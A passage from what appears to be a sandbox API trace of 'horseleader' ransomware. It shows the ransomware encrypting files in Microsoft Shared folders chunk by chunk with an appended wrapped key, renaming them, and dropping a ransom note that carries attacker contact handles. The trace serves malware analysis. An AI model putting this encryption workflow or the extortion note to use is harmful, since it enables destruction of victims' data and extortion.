nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0225.801] CloseHandle (hObject=0x158) returned 1 [0225.802] GetProcessHeap () returned 0x780000 [0225.802] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0225.802] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.horseleader") returned 77 [0225.802] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll.horseleader")) returned 1 [0225.803] GetProcessHeap () returned 0x780000 [0225.803] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0225.803] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8f7000, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdb9ec040, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2f8f7000, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0xf2b88, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0225.803] lstrcmpiW (lpString1="DW20.EXE", lpString2="Windows") returned -1 [0225.803] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 62 [0225.803] StrStrIW (lpFirst="DW20.EXE", lpSrch=".horseleader") returned 0x0 [0225.803] lstrcmpW 
(lpString1="DW20.EXE", lpString2="#Decrypt#.txt") returned 1 [0225.803] lstrcmpW (lpString1="DW20.EXE", lpString2="_uninstalling_.png") returned 1 [0225.803] lstrlenW (lpString=".testttjffg") returned 11 [0225.803] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", lpSrch=".testttjffg") returned 0x0 [0225.803] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0225.803] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0225.803] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0225.865] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 62 [0225.865] StrStrW (lpFirst="DW20.EXE", lpSrch=".txt") returned 0x0 [0225.865] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=994184) returned 1 [0225.865] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.865] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.867] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.868] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.869] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x76dc4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.869] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.871] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.871] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.871] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xedb88, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.871] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.873] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.873] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.874] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.874] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, 
lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0225.874] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0225.874] CloseHandle (hObject=0x158) returned 1 [0225.874] GetProcessHeap () returned 0x780000 [0225.874] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0225.874] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.horseleader") returned 74 [0225.874] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe.horseleader")) returned 1 [0225.875] GetProcessHeap () returned 0x780000 [0225.875] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0225.875] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5e4300, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdbe62980, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2e5e4300, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0x99ba0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="DWTRIG20.EXE", cAlternateFileName="")) returned 1 [0225.875] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2="Windows") returned -1 [0225.875] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\DW\\DWTRIG20.EXE") returned 66 [0225.875] StrStrIW (lpFirst="DWTRIG20.EXE", lpSrch=".horseleader") returned 0x0 [0225.875] lstrcmpW (lpString1="DWTRIG20.EXE", lpString2="#Decrypt#.txt") returned 1 [0225.876] lstrcmpW (lpString1="DWTRIG20.EXE", lpString2="_uninstalling_.png") returned 1 [0225.876] lstrlenW (lpString=".testttjffg") returned 11 [0225.876] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", lpSrch=".testttjffg") returned 0x0 [0225.876] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0225.876] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0225.876] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0225.877] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 66 [0225.877] StrStrW (lpFirst="DWTRIG20.EXE", lpSrch=".txt") returned 0x0 [0225.877] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=629664) returned 1 [0225.877] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.877] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.880] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0225.880] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.881] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x4a5d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.881] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.884] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.884] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.884] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x94ba0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.884] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.886] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.886] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.887] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) 
returned 1 [0225.887] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0225.887] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0225.887] CloseHandle (hObject=0x158) returned 1 [0225.887] GetProcessHeap () returned 0x780000 [0225.887] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0225.887] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.horseleader") returned 78 [0225.887] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe.horseleader")) returned 1 [0225.890] GetProcessHeap () returned 0x780000 [0225.890] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0225.890] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5e4300, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdbe62980, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2e5e4300, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0x99ba0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="DWTRIG20.EXE", cAlternateFileName="")) returned 0 [0225.890] FindClose (in: hFindFile=0x7c6860 
| out: hFindFile=0x7c6860) returned 1 [0225.890] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\#Decrypt#.txt") returned 67 [0225.890] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0225.891] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. 
\r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0225.891] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0225.892] lstrlenA (lpString="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") returned 1368 [0225.892] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0225.892] CloseHandle (hObject=0x21c) returned 1 [0225.893] GetProcessHeap () returned 0x780000 [0225.893] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0225.893] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="EQUATION", cAlternateFileName="")) returned 1 [0225.893] lstrcmpiW (lpString1="EQUATION", lpString2="Windows") returned -1 [0225.893] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION") returned 59 [0225.893] lstrcmpW (lpString1="EQUATION", lpString2=".") returned 1 [0225.893] lstrcmpW (lpString1="EQUATION", lpString2="..") returned 1 [0225.893] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0225.893] GetProcessHeap () returned 0x780000 [0225.893] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0225.893] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*") returned 61 [0225.893] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0225.893] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0225.893] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\.") returned 61 [0225.894] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0225.894] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0225.894] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0225.894] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\EQUATION\\..") returned 62 [0225.894] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0225.894] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0225.894] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="1033", cAlternateFileName="")) returned 1 [0225.894] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0225.894] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033") returned 64 [0225.894] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0225.894] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0225.894] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0225.894] GetProcessHeap () returned 0x780000 [0225.894] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0225.894] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*") returned 66 [0225.894] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, 
ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x47646086, dwReserved1=0xc8731e9a, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0225.896] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0225.896] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\.") returned 66 [0225.896] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0225.896] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x47646086, dwReserved1=0xc8731e9a, cFileName="..", cAlternateFileName="")) returned 1 [0225.896] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0225.896] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\..") returned 67 [0225.896] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0225.896] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0225.896] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723f8e00, ftCreationTime.dwHighDateTime=0x1c2e156, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x723f8e00, ftLastWriteTime.dwHighDateTime=0x1c2e156, nFileSizeHigh=0x0, nFileSizeLow=0xfa60, dwReserved0=0x47646086, dwReserved1=0xc8731e9a, cFileName="EEINTL.DLL", cAlternateFileName="")) returned 1 [0225.896] lstrcmpiW (lpString1="EEINTL.DLL", lpString2="Windows") 
returned -1 [0225.896] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 75 [0225.896] StrStrIW (lpFirst="EEINTL.DLL", lpSrch=".horseleader") returned 0x0 [0225.896] lstrcmpW (lpString1="EEINTL.DLL", lpString2="#Decrypt#.txt") returned 1 [0225.896] lstrcmpW (lpString1="EEINTL.DLL", lpString2="_uninstalling_.png") returned 1 [0225.896] lstrlenW (lpString=".testttjffg") returned 11 [0225.896] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL", lpSrch=".testttjffg") returned 0x0 [0225.898] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0225.898] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0225.898] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0225.898] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 75 [0225.898] StrStrW (lpFirst="EEINTL.DLL", lpSrch=".txt") returned 0x0 [0225.899] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=64096) returned 1 [0225.899] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 